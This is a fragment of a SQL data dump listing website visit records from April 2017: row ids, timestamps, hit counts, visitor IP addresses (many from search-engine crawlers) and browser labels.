(99625,1491881304,1,1,0,0,'216.244.66.237','other'),(99626,1491881834,1,1,0,0,'164.132.161.71','other'),(99627,1491882238,1,1,0,0,'180.76.15.161','other'),(99628,1491883022,1,1,0,0,'164.132.161.92','other'),(99629,1491884138,1,1,0,0,'164.132.161.24','other'),(99630,1491884185,1,1,0,0,'137.74.207.161','other'),(99631,1491884454,1,1,0,0,'137.74.207.114','other'),(99632,1491884841,1,1,0,0,'164.132.161.87','other'),(99633,1491885617,1,1,0,0,'51.255.65.62','other'),(99634,1491885817,1,1,0,0,'137.74.207.110','other'),(99635,1491885979,1,0,1,0,'66.249.76.108',''),(99636,1491886085,1,1,0,0,'51.255.65.16','other'),(99637,1491886117,1,1,0,0,'164.132.161.47','other'),(99638,1491887781,1,1,0,0,'217.182.132.93','other'),(99639,1491887871,2,1,1,0,'207.46.13.153',''),(99640,1491888091,1,1,0,0,'66.102.9.59','chrome'),(99641,1491888093,1,1,0,0,'91.196.178.65','chrome'),(99642,1491889199,1,1,0,0,'91.196.178.69','chrome'),(99643,1491889799,1,1,0,0,'217.182.132.80','other'),(99644,1491890140,1,1,0,0,'46.219.247.100','chrome'),(99645,1491890562,1,1,0,0,'217.182.132.62','other'),(99646,1491890928,1,1,0,0,'164.132.161.46','other'),(99647,1491891168,1,0,1,0,'66.249.76.28',''),(99648,1491891261,1,0,1,0,'40.77.167.101',''),(99649,1491891337,1,1,0,0,'91.196.178.69','other'),(99650,1491891486,1,1,0,0,'46.63.119.219','firefox'),(99651,1491891750,1,1,0,0,'217.182.132.97','other'),(99652,1491891775,1,1,0,0,'51.255.65.83','other'),(99653,1491891844,1,1,0,0,'217.182.132.92','other'),(99654,1491891884,1,1,0,0,'91.196.178.167','chrome'),(99655,1491891899,1,1,0,0,'8.29.198.26','other'),(99656,1491892246,2,2,0,0,'95.132.23.56','firefox'),(99657,1491892502,1,1,0,0,'51.255.65.69','other'),(99658,1491892721,1,1,0,0,'51.255.65.62','other'),(99659,1491892847,1,1,0,0,'217.182.132.65','other'),(99660,1491893276,1,1,0,0,'95.132.23.56','firefox'),(99661,1491893312,1,1,0,0,'164.132.161.43','other'),(99662,1491893845,1,1,0,0,'130.180.217.134','firefox'),(99663,1491893872,1,1,0,0,'82.207.91.234','firefox'),(99664,1491894101,1,0,1,0,'66.249.76.107',''),(99665,1491894135,1,1,0,0,'164.132.161.80','other'),(99666,1491894792,1,1,0,0,'217.182.132.55','other'),(99667,1491895395,1,1,0,0,'217.182.132.23','other'),(99668,1491895772,1,1,0,0,'216.244.66.237','other'),(99669,1491895908,1,1,0,0,'164.132.161.49','other'),(99670,1491895977,2,0,2,0,'40.77.167.95',''),(99671,1491896265,1,1,0,0,'217.182.132.92','other'),(99672,1491896359,1,1,0,0,'164.132.161.65','other'),(99673,1491896428,1,1,0,0,'164.132.161.96','other'),(99674,1491897818,1,0,1,0,'40.77.167.101',''),(99675,1491897998,1,1,0,0,'137.74.201.99','other'),(99676,1491898767,1,0,1,0,'40.77.167.101',''),(99677,1491900215,1,1,0,0,'91.211.135.105','chrome'),(99678,1491900553,1,0,1,0,'207.46.13.27',''),(99679,1491901281,1,1,0,0,'91.201.247.139','chrome'),(99680,1491901325,1,1,0,0,'164.132.161.17','other'),(99681,1491901526,1,1,0,0,'91.218.15.226','chrome'),(99682,1491901729,1,1,0,0,'208.43.225.84','other'),(99683,1491901853,1,1,0,0,'51.255.65.8','other'),(99684,1491902041,1,1,0,0,'51.255.65.81','other'),(99685,1491902172,1,1,0,0,'180.76.15.163','other'),(99686,1491902503,1,1,0,0,'216.244.66.237','other'),(99687,1491902734,1,1,0,0,'8.29.198.27','other'),(99688,1491903109,1,1,0,0,'217.182.132.148','other'),(99689,1491903883,1,1,0,0,'91.196.178.66','chrome'),(99690,1491904061,1,1,0,0,'164.132.161.89','other'),(99691,1491904153,2,2,0,0,'91.196.178.69','firefox'),(99692,1491904177,1,1,0,0,'164.132.161.85','other'),(99693,1491904448,1,1,0,0,'217.182.132.36','other'),(99694,1491904821,1,1,0,0,'51.255.65.74','other'),(99695,1491904957,1,1,0,0,'51.255.71.100','other'),(99696,1491905035,1,1,0,0,'164.132.161.3','other'),(99697,1491905206,1,1,0,0,'217.182.132.174','other'),(99698,1491905265,1,1,0,0,'91.196.178.70','firefox'),(99699,1491905339,1,0,1,0,'66.249.66.84',''),(99700,1491905730,1,0,1,0,'66.249.76.107',''),(99701,1491905775,1,1,0,0,'176.120.61.90','chrome'),(99702,1491905787,1,1,0,0,'91.196.178.167','chrome'),(99703,1491905895,1,1,0,0,'141.8.132.50','other'),(99704,1491906110,1,1,0,0,'217.182.132.147','other'),(99705,1491906152,1,1,0,0,'164.132.161.6','other'),(99706,1491906345,1,1,0,0,'217.182.132.34','other'),(99707,1491906506,1,1,0,0,'178.94.136.171','opera'),(99708,1491907028,1,1,0,0,'164.132.161.2','other'),(99709,1491907355,1,1,0,0,'91.192.135.241','firefox'),(99710,1491907412,1,1,0,0,'51.255.65.81','other'),(99711,1491907514,1,1,0,0,'217.182.132.149','other'),(99712,1491907654,1,1,0,0,'164.132.161.22','other'),(99713,1491908202,1,1,0,0,'178.94.136.171','opera'),(99714,1491908856,1,1,0,0,'46.219.247.100','chrome'),(99715,1491908930,1,0,1,0,'40.77.167.16',''),(99716,1491908963,1,1,0,0,'46.200.34.243','chrome'),(99717,1491908982,1,1,0,0,'195.49.151.99','chrome'),(99718,1491908984,1,1,0,0,'157.55.39.66','other'),(99719,1491909085,1,1,0,0,'141.8.142.164','other'),(99720,1491909308,1,1,0,0,'91.196.178.69','other'),(99721,1491909610,1,1,0,0,'178.94.136.171','opera'),(99722,1491909709,1,1,0,0,'217.182.132.34','other'),(99723,1491909749,1,1,0,0,'51.255.71.111','other'),(99724,1491909765,1,1,0,0,'82.207.91.246','firefox'),(99725,1491910041,1,1,0,0,'164.132.161.60','other'),(99726,1491910656,1,1,0,0,'46.219.247.100','chrome'),(99727,1491911801,1,1,0,0,'91.196.178.69','chrome'),(99728,1491911945,1,1,0,0,'51.255.65.82','other'),(99729,1491912060,1,1,0,0,'157.55.39.185','other'),(99730,1491912137,1,1,0,0,'180.76.15.23','other'),(99731,1491912199,1,1,0,0,'51.255.65.70','other'),(99732,1491912456,1,1,0,0,'46.219.247.100','chrome'),(99733,1491912733,1,1,0,0,'91.196.178.69','chrome'),(99734,1491912891,1,1,0,0,'91.196.178.167','chrome'),(99735,1491913118,1,1,0,0,'95.108.179.15','other'),(99736,1491913480,1,1,0,0,'51.255.65.21','other'),(99737,1491913561,1,1,0,0,'8.29.198.26','other'),(99738,1491913689,1,1,0,0,'164.132.161.26','other'),(99739,1491913889,1,1,0,0,'217.182.132.34','other'),(99740,1491914075,1,1,0,0,'51.255.65.57','other'),(99741,1491914256,1,1,0,0,'46.219.247.100','chrome'),(99742,1491914367,1,0,1,0,'207.46.13.94',''),(99743,1491914688,1,1,0,0,'217.182.132.31','other'),(99744,1491915015,1,1,0,0,'91.196.178.70','firefox'),(99745,1491915408,1,1,0,0,'195.10.210.49','chrome'),(99746,1491915577,1,1,0,0,'91.192.135.241','firefox'),(99747,1491915892,1,1,0,0,'95.135.174.169','chrome'),(99748,1491916056,1,1,0,0,'46.219.247.100','chrome'),(99749,1491916299,1,1,0,0,'51.255.65.18','other'),(99750,1491916511,1,1,0,0,'217.182.132.180','other'),(99751,1491917214,1,1,0,0,'91.196.178.69','firefox'),(99752,1491917270,1,1,0,0,'217.182.132.67','other'),(99753,1491917630,1,1,0,0,'51.255.65.66','other'),(99754,1491917856,1,1,0,0,'46.219.247.100','chrome'),(99755,1491917946,1,1,0,0,'217.182.132.190','other'),(99756,1491918228,1,1,0,0,'164.132.161.24','other'),(99757,1491918478,1,1,0,0,'91.196.178.66','chrome'),(99758,1491918484,1,1,0,0,'217.182.132.71','other'),(99759,1491918672,1,1,0,0,'95.108.213.7','other'),(99760,1491918682,1,1,0,0,'51.255.65.20','other'),(99761,1491918743,1,1,0,0,'46.211.20.44','chrome'),(99762,1491918914,1,1,0,0,'91.196.178.69','firefox'),(99763,1491919158,1,1,0,0,'164.132.161.15','other'),(99764,1491919502,1,1,0,0,'95.108.179.15','other'),(99765,1491919634,1,1,0,0,'137.74.207.188','other'),(99766,1491919818,1,1,0,0,'66.249.76.29','chrome'),(99767,1491919827,1,1,0,0,'66.249.66.210','chrome'),(99768,1491920058,1,1,0,0,'51.255.71.114','other'),(99769,1491920416,1,1,0,0,'51.255.65.53','other'),(99770,1491920688,1,1,0,0,'164.132.161.89','other'),(99771,1491921223,1,1,0,0,'46.211.20.44','chrome'),(99772,1491922137,1,1,0,0,'46.211.20.44','chrome'),(99773,1491922469,1,1,0,0,'51.255.65.38','other'),(99774,1491922881,1,1,0,0,'164.132.162.153','other'),(99775,1491923044,1,1,0,0,'51.255.65.75','other'),(99776,1491923209,1,1,0,0,'51.255.65.30','other'),(99777,1491923464,1,1,0,0,'164.132.161.66','other'),(99778,1491923796,1,1,0,0,'51.255.65.25','other'),(99779,1491924087,1,1,0,0,'217.182.132.71','other'),(99780,1491924312,1,1,0,0,'164.132.161.69','other'),(99781,1491924398,1,1,0,0,'8.29.198.26','other'),(99782,1491924454,1,1,0,0,'51.255.65.18','other'),(99783,1491924943,1,0,1,0,'66.249.66.81',''),(99784,1491926384,1,1,0,0,'95.132.39.103','firefox'),(99785,1491927632,1,1,0,0,'217.182.132.35','other'),(99786,1491927805,1,1,0,0,'164.132.161.80','other'),(99787,1491927926,1,0,1,0,'66.249.76.109',''),(99788,1491928185,1,1,0,0,'66.102.9.40','chrome'),(99789,1491928292,1,1,0,0,'66.249.76.28','chrome'),(99790,1491928892,1,1,0,0,'51.255.64.106','other'),(99791,1491930504,1,1,0,0,'217.182.132.28','other'),(99792,1491930961,1,1,0,0,'137.74.207.114','other'),(99793,1491931814,1,1,0,0,'208.43.225.84','other'),(99794,1491932403,1,1,0,0,'91.196.178.35','chrome'),(99795,1491932520,1,1,0,0,'164.132.162.188','other'),(99796,1491932812,1,1,0,0,'217.182.132.95','other'),(99797,1491933132,1,1,0,0,'164.132.161.37','other'),(99798,1491934070,1,0,1,0,'207.46.13.8',''),(99799,1491934148,1,1,0,0,'217.182.132.147','other'),(99800,1491935024,1,1,0,0,'51.255.65.28','other'),(99801,1491935232,1,1,0,0,'8.29.198.26','other'),(99802,1491936012,1,1,0,0,'51.255.65.65','other'),(99803,1491936035,1,1,0,0,'51.255.71.126','other'),(99804,1491937070,1,1,0,0,'51.255.65.33','other'),(99805,1491937688,1,1,0,0,'217.182.132.174','other'),(99806,1491937769,1,1,0,0,'217.182.132.77','other'),(99807,1491937891,1,1,0,0,'91.196.178.104','chrome'),(99808,1491939280,1,1,0,0,'164.132.161.86','other'),(99809,1491940451,1,1,0,0,'217.182.132.19','other'),(99810,1491940687,1,1,0,0,'164.132.161.93','other'),(99811,1491940829,1,1,0,0,'178.92.81.111','chrome'),(99812,1491941122,1,1,0,0,'164.132.161.17','other'),(99813,1491942475,1,1,0,0,'51.255.65.30','other'),(99814,1491942518,1,1,0,0,'66.249.76.107','chrome'),(99815,1491942825,1,1,0,0,'217.182.132.31','other'),(99816,1491943114,1,1,0,0,'217.182.132.94','other'),(99817,1491943536,1,0,1,0,'66.249.76.29',''),(99818,1491945210,1,1,0,0,'217.182.132.23','other'),(99819,1491945348,1,0,1,0,'66.249.76.30',''),(99820,1491946069,1,1,0,0,'8.29.198.25','other'),(99821,1491946414,1,1,0,0,'217.182.132.85','other'),(99822,1491946554,1,1,0,0,'188.255.17.72','msie'),(99823,1491946593,1,1,0,0,'217.182.132.86','other'),(99824,1491946826,1,0,1,0,'66.249.66.180',''),(99825,1491947152,1,1,0,0,'217.182.132.155','other'),(99826,1491948098,1,1,0,0,'164.132.162.164','other'),(99827,1491948819,1,0,1,0,'66.249.76.29',''),(99828,1491949523,1,1,0,0,'51.255.65.34','other'),(99829,1491949993,1,1,0,0,'141.8.142.15','other'),(99830,1491950248,1,1,0,0,'51.255.65.66','other'),(99831,1491950541,1,1,0,0,'217.182.132.72','other'),(99832,1491950674,1,1,0,0,'217.182.132.36','other'),(99833,1491950813,1,1,0,0,'164.132.161.87','other'),(99834,1491950912,1,1,0,0,'66.249.66.84','chrome'),(99835,1491951199,1,1,0,0,'77.37.222.252','msie'),(99836,1491951602,1,1,0,0,'128.69.152.23','msie'),(99837,1491951826,1,0,1,0,'66.249.66.87',''),(99838,1491953491,1,1,0,0,'217.182.132.192','other'),(99839,1491954182,1,1,0,0,'164.132.161.9','other'),(99840,1491954761,1,1,0,0,'164.132.161.66','other'),(99841,1491954809,1,1,0,0,'51.255.71.114','other'),(99842,1491954832,1,0,1,0,'66.249.76.107',''),(99843,1491954911,1,0,1,0,'66.249.76.30',''),(99844,1491956200,1,1,0,0,'217.182.132.173','other'),(99845,1491956656,1,1,0,0,'217.182.132.174','other'),(99846,1491956799,1,1,0,0,'164.132.161.38','other'),(99847,1491956899,1,1,0,0,'8.29.198.27','other'),(99848,1491958047,1,1,0,0,'164.132.161.29','other'),(99849,1491958378,1,1,0,0,'157.55.39.196','other'),(99850,1491958876,1,1,0,0,'217.182.132.91','other'),(99851,1491959188,1,0,1,0,'66.249.76.108',''),(99852,1491959312,1,1,0,0,'164.132.161.54','other'),(99853,1491959688,1,1,0,0,'164.132.161.33','other'),(99854,1491960414,1,1,0,0,'51.255.65.48','other'),(99855,1491960633,1,0,1,0,'66.249.76.108',''),(99856,1491961604,1,1,0,0,'137.74.207.188','other'),(99857,1491961976,1,0,1,0,'157.55.39.185',''),(99858,1491962087,1,1,0,0,'51.255.65.53','other'),(99859,1491962154,1,1,0,0,'164.132.161.34','other'),(99860,1491964179,1,1,0,0,'217.182.132.170','other'),(99861,1491964584,1,1,0,0,'51.255.71.117','other'),(99862,1491964741,1,0,1,0,'66.249.76.30',''),(99863,1491964840,1,1,0,0,'51.255.71.100','other'),(99864,1491965651,1,1,0,0,'217.182.132.95','other'),(99865,1491966259,1,1,0,0,'164.132.161.33','other'),(99866,1491966323,1,1,0,0,'51.255.65.24','other'),(99867,1491966855,1,0,1,0,'66.249.66.183',''),(99868,1491967250,1,1,0,0,'164.132.161.80','other'),(99869,1491967526,1,1,0,0,'217.182.132.186','other'),(99870,1491967538,2,0,2,0,'66.249.76.108',''),(99871,1491967739,1,1,0,0,'8.29.198.26','other'),(99872,1491968188,1,1,0,0,'217.182.132.19','other'),(99873,1491969193,1,1,0,0,'217.182.132.181','other'),(99874,1491969766,1,1,0,0,'164.132.161.17','other'),(99875,1491969936,1,1,0,0,'164.132.161.26','other'),(99876,1491969998,4,4,0,0,'178.137.19.92','other'),(99877,1491971120,1,1,0,0,'164.132.161.8','other'),(99878,1491971910,1,1,0,0,'91.196.178.69','firefox'),(99879,1491972371,1,0,1,0,'66.249.76.28',''),(99880,1491972837,1,0,1,0,'66.249.66.180',''),(99881,1491972999,1,0,1,0,'66.249.66.81',''),(99882,1491973219,1,1,0,0,'51.255.64.106','other'),(99883,1491973751,1,1,0,0,'66.102.9.61','chrome'),(99884,1491974149,1,1,0,0,'164.132.161.79','other'),(99885,1491974290,1,0,1,0,'66.249.66.180',''),(99886,1491974691,1,1,0,0,'91.196.178.69','firefox'),(99887,1491974715,1,1,0,0,'157.55.39.9','other'),(99888,1491974767,1,1,0,0,'180.76.15.22','other'),(99889,1491974989,1,1,0,0,'91.196.178.72','chrome'),(99890,1491975249,1,1,0,0,'91.196.178.33','firefox'),(99891,1491976212,1,1,0,0,'216.244.66.237','other'),(99892,1491976264,1,1,0,0,'91.196.178.72','chrome'),(99893,1491976624,1,1,0,0,'164.132.161.80','other'),(99894,1491976836,1,1,0,0,'207.46.13.62','other'),(99895,1491977448,1,1,0,0,'164.132.161.32','other'),(99896,1491977907,1,1,0,0,'91.196.178.66','firefox'),(99897,1491978104,1,0,1,0,'66.249.76.29',''),(99898,1491978269,1,1,0,0,'216.244.66.237','other'),(99899,1491978481,1,1,0,0,'195.49.151.99','chrome'),(99900,1491978494,1,1,0,0,'164.132.161.16','other'),(99901,1491978579,1,1,0,0,'8.29.198.25','other'),(99902,1491979052,1,1,0,0,'91.196.178.71','chrome'),(99903,1491979187,1,1,0,0,'91.196.178.72','firefox'),(99904,1491979274,1,1,0,0,'51.255.71.111','other'),(99905,1491979860,1,1,0,0,'217.182.132.50','other'),(99906,1491979992,1,1,0,0,'164.132.161.84','other'),(99907,1491980362,1,0,1,0,'66.249.76.108',''),(99908,1491980522,1,1,0,0,'66.249.76.107','chrome'),(99909,1491980728,1,1,0,0,'37.52.20.27','firefox'),(99910,1491981043,1,1,0,0,'91.196.178.101','chrome'),(99911,1491981396,1,1,0,0,'164.132.161.4','other'),(99912,1491981686,1,1,0,0,'217.182.132.93','other'),(99913,1491981853,1,0,1,0,'207.46.13.36',''),(99914,1491982215,1,1,0,0,'217.182.132.72','other'),(99915,1491982354,1,1,0,0,'164.132.161.49','other'),(99916,1491982897,1,0,1,0,'66.249.66.180',''),(99917,1491983282,1,0,1,0,'66.249.66.84',''),(99918,1491983657,1,1,0,0,'95.108.213.7','other'),(99919,1491983665,1,0,1,0,'66.249.66.87',''),(99920,1491983957,1,1,0,0,'51.255.65.94','other'),(99921,1491984354,1,1,0,0,'94.178.109.74','firefox'),(99922,1491984493,1,1,0,0,'51.255.65.87','other'),(99923,1491984776,1,1,0,0,'109.207.199.95','firefox'),(99924,1491984827,2,0,2,0,'66.249.76.29',''),(99925,1491985060,1,1,0,0,'217.182.132.76','other'),(99926,1491985068,1,0,1,0,'66.249.66.180',''),(99927,1491985099,2,2,0,0,'37.52.20.27','firefox'),(99928,1491985143,1,1,0,0,'178.94.60.4','chrome'),(99929,1491985152,1,0,1,0,'66.249.76.108',''),(99930,1491985174,1,1,0,0,'180.76.15.24','other'),(99931,1491985211,1,1,0,0,'217.182.132.67','other'),(99932,1491985454,1,1,0,0,'164.132.161.39','other'),(99933,1491985700,1,1,0,0,'164.132.161.87','other'),(99934,1491986073,1,0,1,0,'66.249.76.109',''),(99935,1491986708,1,1,0,0,'217.182.132.193','other'),(99936,1491986873,1,1,0,0,'51.255.65.75','other'),(99937,1491987514,43,43,0,0,'85.144.181.178','other'),(99938,1491987733,1,1,0,0,'91.196.178.68','chrome'),(99939,1491987768,1,1,0,0,'91.196.122.186','chrome'),(99940,1491988506,1,1,0,0,'157.55.39.107','other'),(99941,1491988763,1,1,0,0,'37.53.86.218','chrome'),(99942,1491988775,1,1,0,0,'93.158.152.60','other'),(99943,1491989382,1,1,0,0,'51.255.65.47','other'),(99944,1491989413,1,1,0,0,'8.29.198.27','other'),(99945,1491989583,1,1,0,0,'92.113.173.40','firefox'),(99946,1491990143,1,1,0,0,'51.255.71.133','other'),(99947,1491990575,1,1,0,0,'107.21.1.8','other'),(99948,1491990960,1,1,0,0,'217.182.132.7','other'),(99949,1491991059,1,1,0,0,'213.169.67.185','chrome'),(99950,1491992524,1,1,0,0,'164.132.161.61','other'),(99951,1491992540,2,2,0,0,'95.135.90.157','other'),(99952,1491992693,1,0,1,0,'66.249.76.30',''),(99953,1491992728,1,1,0,0,'157.55.39.107','other'),(99954,1491992824,1,1,0,0,'91.196.177.46','chrome'),(99955,1491993291,1,1,0,0,'91.196.178.69','firefox'),(99956,1491993945,1,1,0,0,'130.180.217.42','firefox'),(99957,1491994361,1,1,0,0,'66.249.76.107','chrome'),(99958,1491994655,1,1,0,0,'51.255.65.55','other'),(99959,1491994730,1,1,0,0,'91.196.177.26','chrome'),(99960,1491994876,1,1,0,0,'217.182.132.149','other'),(99961,1491995580,1,0,1,0,'66.249.66.177',''),(99962,1491995740,1,1,0,0,'51.255.65.9','other'),(99963,1491996126,1,0,1,0,'66.249.66.87',''),(99964,1491996935,1,1,0,0,'188.32.190.236','msie'),(99965,1491996957,1,1,0,0,'216.244.66.237','other'),(99966,1491997039,1,1,0,0,'164.132.161.4','other'),(99967,1491997166,1,0,1,0,'66.249.76.108',''),(99968,1491997298,1,1,0,0,'91.196.178.69','firefox'),(99969,1491997676,1,1,0,0,'141.8.142.15','other'),(99970,1491998053,1,1,0,0,'66.249.66.183','chrome'),(99971,1491998057,1,1,0,0,'66.249.66.180','chrome'),(99972,1491998154,1,1,0,0,'213.169.67.185','chrome'),(99973,1491998320,1,1,0,0,'141.8.142.154','other'),(99974,1491998525,1,1,0,0,'91.196.178.71','firefox'),(99975,1491999083,1,1,0,0,'164.132.162.154','other'),(99976,1491999581,1,1,0,0,'95.132.45.138','firefox'),(99977,1491999623,1,0,1,0,'66.249.76.29',''),(99978,1492000244,1,1,0,0,'8.29.198.27','other'),(99979,1492000248,1,1,0,0,'51.255.65.83','other'),(99980,1492001601,1,1,0,0,'51.255.71.100','other'),(99981,1492001922,1,1,0,0,'217.182.132.90','other'),(99982,1492001978,2,2,0,0,'91.209.11.236','other'),(99983,1492002174,1,1,0,0,'51.255.71.122','other'),(99984,1492002243,1,1,0,0,'217.182.132.66','other'),(99985,1492002257,1,0,1,0,'40.77.167.115',''),(99986,1492002265,1,1,0,0,'51.255.65.39','other'),(99987,1492002828,1,1,0,0,'51.255.65.5','other'),(99988,1492003223,1,1,0,0,'164.132.161.27','other'),(99989,1492003842,1,1,0,0,'213.179.252.50','chrome'),(99990,1492003860,1,1,0,0,'37.9.113.38','other'),(99991,1492003996,1,1,0,0,'91.209.11.236','other'),(99992,1492004369,1,1,0,0,'95.135.212.137','chrome'),(99993,1492004384,1,1,0,0,'217.182.132.21','other'),(99994,1492004531,1,1,0,0,'37.73.251.48','chrome'),(99995,1492004686,1,1,0,0,'164.132.161.52','other'),(99996,1492005098,1,1,0,0,'91.196.178.72','other'),(99997,1492005310,1,1,0,0,'51.255.65.97','other'),(99998,1492005361,1,1,0,0,'91.224.96.187','chrome'),(99999,1492005422,1,1,0,0,'217.182.132.20','other'),(100000,1492005716,1,1,0,0,'176.31.231.10','other'),(100001,1492005926,1,1,0,0,'217.182.132.150','other'),(100002,1492006700,1,1,0,0,'194.44.144.18','chrome'),(100003,1492007568,1,0,1,0,'66.249.76.29',''),(100004,1492007851,1,1,0,0,'91.209.11.236','other'),(100005,1492007993,1,1,0,0,'66.249.93.157','chrome'),(100006,1492008061,2,2,0,0,'164.132.161.4','other'),(100007,1492008244,1,1,0,0,'164.132.161.49','other'),(100008,1492008321,1,1,0,0,'51.255.71.98','other'),(100009,1492008578,1,0,1,0,'66.249.76.109',''),(100010,1492008779,1,1,0,0,'164.132.161.24','other'),(100011,1492008943,1,1,0,0,'217.182.132.53','other'),(100012,1492009649,2,2,0,0,'91.209.11.236','other'),(100013,1492011084,1,1,0,0,'8.29.198.25','other'),(100014,1492011180,1,1,0,0,'46.211.20.44','chrome'),(100015,1492011200,1,1,0,0,'137.74.207.188','other'),(100016,1492011215,1,1,0,0,'217.182.132.68','other'),(100017,1492011235,1,1,0,0,'217.182.132.83','other'),(100018,1492011394,1,1,0,0,'217.182.132.65','other'),(100019,1492012531,1,1,0,0,'217.182.132.76','other'),(100020,1492012695,2,2,0,0,'141.8.142.15','other'),(100021,1492013768,1,1,0,0,'95.135.90.121','firefox'),(100022,1492014228,1,1,0,0,'95.108.213.7','other'),(100023,1492014232,1,1,0,0,'217.182.132.179','other'),(100024,1492014273,1,1,0,0,'217.182.132.64','other'),(100025,1492014471,1,1,0,0,'51.255.65.65','other'),(100026,1492015058,1,1,0,0,'137.74.207.164','other'),(100027,1492015060,6,6,0,0,'141.8.142.154','other'),(100028,1492015190,6,6,0,0,'95.108.213.34','other'),(100029,1492015393,1,1,0,0,'95.108.213.8','other'),(100030,1492015455,6,6,0,0,'141.8.142.15','other'),(100031,1492015509,7,7,0,0,'95.108.179.15','other'),(100032,1492015528,2,2,0,0,'95.108.213.7','other'),(100033,1492015601,3,3,0,0,'141.8.142.164','other'),(100034,1492015653,3,3,0,0,'5.255.253.63','other'),(100035,1492015800,1,1,0,0,'91.196.178.34','chrome'),(100036,1492015933,1,1,0,0,'51.255.65.90','other'),(100037,1492016197,2,2,0,0,'141.8.142.154','other'),(100038,1492016582,1,1,0,0,'95.108.213.34','other'),(100039,1492016897,1,1,0,0,'164.132.161.65','other'),(100040,1492016989,1,1,0,0,'51.255.65.63','other'),(100041,1492017088,1,1,0,0,'95.108.213.7','other'),(100042,1492017217,1,1,0,0,'217.182.132.65','other'),(100043,1492017491,1,1,0,0,'95.108.213.34','other'),(100044,1492017544,1,1,0,0,'40.77.167.65','other'),(100045,1492017562,1,1,0,0,'141.8.142.15','other'),(100046,1492017594,1,1,0,0,'217.182.132.18','other'),(100047,1492017611,1,1,0,0,'51.255.65.27','other'),(100048,1492017657,1,1,0,0,'40.77.167.10','other'),(100049,1492017876,1,1,0,0,'164.132.161.32','other'),(100050,1492017931,2,2,0,0,'141.8.183.1','other'),(100051,1492018035,2,2,0,0,'178.154.200.2','other'),(100052,1492018065,1,1,0,0,'51.255.65.40','other'),(100053,1492018344,1,1,0,0,'164.132.161.31','other'),(100054,1492018403,2,2,0,0,'141.8.132.39','other'),(100055,1492018501,1,1,0,0,'51.255.65.61','other'),(100056,1492018636,4,4,0,0,'141.8.132.25','other'),(100057,1492018736,2,2,0,0,'141.8.142.164','other'),(100058,1492018777,1,1,0,0,'217.182.132.24','other'),(100059,1492018891,1,1,0,0,'5.255.253.43','other'),(100060,1492019011,1,1,0,0,'141.8.183.1','other'),(100061,1492019043,1,1,0,0,'178.154.149.3','other'),(100062,1492019150,1,1,0,0,'95.108.213.8','other'),(100063,1492019189,1,1,0,0,'51.255.65.45','other'),(100064,1492019207,1,1,0,0,'137.74.207.164','other'),(100065,1492019580,1,1,0,0,'141.8.142.154','other'),(100066,1492019586,1,1,0,0,'178.154.149.1','other'),(100067,1492019592,1,1,0,0,'95.108.213.34','other'),(100068,1492019594,3,3,0,0,'141.8.132.39','other'),(100069,1492019597,1,1,0,0,'5.255.253.83','other'),(100070,1492019634,1,1,0,0,'66.102.9.22','chrome'),(100071,1492019675,1,1,0,0,'37.9.113.38','other'),(100072,1492019748,1,1,0,0,'164.132.161.58','other'),(100073,1492019761,1,1,0,0,'141.8.132.25','other'),(100074,1492020013,1,1,0,0,'95.132.115.73','chrome'),(100075,1492020455,1,1,0,0,'164.132.161.52','other'),(100076,1492020581,1,1,0,0,'141.8.132.39','other'),(100077,1492020583,1,1,0,0,'93.158.152.77','other'),(100078,1492020586,1,1,0,0,'141.8.142.38','other'),(100079,1492020637,1,1,0,0,'164.132.161.41','other'),(100080,1492020844,1,1,0,0,'217.182.132.33','other'),(100081,1492020866,1,1,0,0,'178.154.200.37','other'),(100082,1492020869,2,2,0,0,'141.8.142.154','other'),(100083,1492021094,1,1,0,0,'5.255.253.43','other'),(100084,1492021097,1,1,0,0,'178.154.149.3','other'),(100085,1492021111,1,1,0,0,'95.108.213.7','other'),(100086,1492021113,2,2,0,0,'141.8.142.97','other'),(100087,1492021116,1,1,0,0,'5.255.253.28','other'),(100088,1492021372,1,1,0,0,'93.158.152.79','other'),(100089,1492021654,2,2,0,0,'141.8.142.49','other'),(100090,1492021744,1,1,0,0,'5.255.253.70','other'),(100091,1492021783,1,1,0,0,'141.8.142.17','other'),(100092,1492021789,1,1,0,0,'51.255.71.132','other'),(100093,1492021861,1,1,0,0,'46.211.113.118','chrome'),(100094,1492021885,1,1,0,0,'51.255.65.86','other'),(100095,1492021918,1,1,0,0,'8.29.198.27','other'),(100096,1492022079,1,1,0,0,'164.132.161.37','other'),(100097,1492022290,1,1,0,0,'178.154.200.64','other'),(100098,1492022447,1,1,0,0,'51.255.65.90','other'),(100099,1492022744,2,2,0,0,'141.8.142.49','other'),(100100,1492022746,1,1,0,0,'178.154.200.45','other'),(100101,1492022951,2,2,0,0,'178.154.189.22','other'),(100102,1492023071,1,1,0,0,'5.255.253.58','other'),(100103,1492023151,1,1,0,0,'164.132.162.157','other'),(100104,1492023180,2,2,0,0,'95.108.213.32','other'),(100105,1492023183,1,1,0,0,'5.255.253.70','other'),(100106,1492023220,2,2,0,0,'178.154.189.29','other'),(100107,1492023242,1,1,0,0,'137.74.201.108','other'),(100108,1492023330,1,1,0,0,'51.255.65.7','other'),(100109,1492023411,1,1,0,0,'5.255.253.78','other'),(100110,1492023444,1,1,0,0,'141.8.142.97','other'),(100111,1492023471,1,1,0,0,'40.77.167.1','other'),(100112,1492023506,1,1,0,0,'91.196.178.167','chrome'),(100113,1492023629,1,1,0,0,'93.158.152.59','other'),(100114,1492023839,1,1,0,0,'141.8.142.17','other'),(100115,1492023919,1,1,0,0,'95.108.179.8','other'),(100116,1492024060,1,1,0,0,'141.8.142.48','other'),(100117,1492024095,1,1,0,0,'141.8.142.28','other'),(100118,1492024227,1,1,0,0,'141.8.142.4','other'),(100119,1492024574,1,1,0,0,'92.101.80.191','chrome'),(100120,1492024755,2,2,0,0,'178.154.200.41','other'),(100121,1492024981,1,1,0,0,'95.108.179.8','other'),(100122,1492025268,2,2,0,0,'5.255.253.70','other'),(100123,1492025279,1,1,0,0,'37.9.113.5','other'),(100124,1492025298,1,1,0,0,'178.154.189.29','other'),(100125,1492025301,1,1,0,0,'178.154.189.3','other'),(100126,1492025316,2,2,0,0,'141.8.132.43','other'),(100127,1492025362,1,1,0,0,'93.158.152.42','other'),(100128,1492025376,1,1,0,0,'178.154.200.60','other'),(100129,1492025435,1,1,0,0,'93.158.152.60','other'),(100130,1492025509,2,2,0,0,'5.255.253.31','other'),(100131,1492025589,2,2,0,0,'141.8.142.4','other'),(100132,1492025938,1,1,0,0,'178.154.189.16','other'),(100133,1492026000,1,1,0,0,'138.197.125.9','other'),(100134,1492026049,1,1,0,0,'178.154.200.64','other'),(100135,1492026051,1,1,0,0,'141.8.132.72','other'),(100136,1492026075,1,1,0,0,'5.255.253.78','other'),